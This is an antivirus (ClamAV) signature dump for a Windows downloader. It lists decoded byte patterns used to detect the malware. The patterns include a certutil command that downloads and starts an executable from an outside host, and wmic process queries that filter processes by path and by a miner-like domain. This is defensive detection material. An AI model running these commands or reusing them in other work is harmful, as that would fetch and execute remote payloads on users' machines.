VIRUS NAME: Win.Downloader.Ursu-6977345-0
TDB: Engine:51-255,Target:1
LOGICAL EXPRESSION: (0|1|2|3|4)>3,4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
') OR (CommandLine LIKE '%_ppxxmr.com_%')) AND NOT (CommandLine LIKE '%_wmic_%'))" get ExecutablePath,ParentProcessId /value
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ystem32%winlogon_%'))" get ExecutablePath /value
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
wmic process where "(NOT (ExecutablePath LIKE '%_Windows%system32%svchost_%') AND NOT (ExecutablePath LIKE '%_Windows%system32%
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cmd.exe /c certutil -urlcache -split -f http://d4uk.7h4uk.com/w_download.exe w_download.exe && start w_download.exe && certutil 
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
NOT (ExecutablePath LIKE '%_Windows%system32%taskmgr_%') AND NOT (ExecutablePath LIKE '%_Windows%system32%cmd_%') AND NOT (Execu
